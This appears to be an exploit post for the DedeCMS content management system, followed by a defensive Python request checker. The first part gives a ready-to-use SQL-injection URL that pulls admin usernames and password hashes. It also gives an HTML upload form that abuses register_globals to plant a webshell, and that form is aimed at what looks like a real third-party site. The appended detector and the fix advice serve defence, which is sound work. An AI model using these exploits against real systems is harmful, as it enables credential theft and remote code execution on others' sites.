DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
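
Added example (not part of the original post, and not DedeCMS code): a Python request check that a defender could run in a reverse proxy hook or over parsed request logs to flag the two request shapes listed above. The function name findings, the form dict, the result labels and the cms.example.test host are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# UNION ... SELECT has no place in a page URL passed as arcurl.
SQLI = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)
SCRIPT_EXT = (".php", ".phtml", ".php5")

def findings(method, url, form=None):
    """Return the reasons a request matches either pattern on this page.

    form: dict of POST field name -> value (assumption: the caller, e.g. a
    reverse-proxy or WAF hook, has already parsed the request body).
    """
    form = form or {}
    parts = urlsplit(url)
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    out = []
    if path.endswith("/feedback_js.php"):
        for value in query.get("arcurl", []):
            if "'" in value or '"' in value or SQLI.search(value):
                out.append("sqli-in-arcurl")
                break
    # With register_globals = on, a request parameter named cfg_* overwrites
    # any configuration variable the script did not initialise itself.
    cfg = sorted(n for n in set(query) | set(form) if n.lower().startswith("cfg_"))
    if cfg:
        out.append("client-set-config:" + ",".join(cfg))
    if path.endswith("/select_soft_post.php") and method.upper() == "POST":
        if form.get("newname", "").lower().endswith(SCRIPT_EXT):
            out.append("script-upload-name")
    return out

# Constructed sample requests (not taken from real traffic).
SAMPLES = [
    ("GET", "http://cms.example.test/plus/feedback_js.php"
            "?arcurl=%27%20union%20select%201", None),
    ("GET", "http://cms.example.test/plus/feedback_js.php"
            "?arcurl=http%3A%2F%2Fcms.example.test%2Fa%2F1.html", None),
    ("POST", "http://cms.example.test/include/dialog/select_soft_post.php",
     {"cfg_basedir": "../../", "cfg_softtype": "php",
      "job": "upload", "newname": "fly.php"}),
]

if __name__ == "__main__":
    for method, url, form in SAMPLES:
        print(method, urlsplit(url).path, findings(method, url, form))
```

Any client-set-config hit is worth alerting on regardless of path, since legitimate clients have no reason to send cfg_* parameters; the durable fix is register_globals = off plus explicit initialisation of those variables in the script.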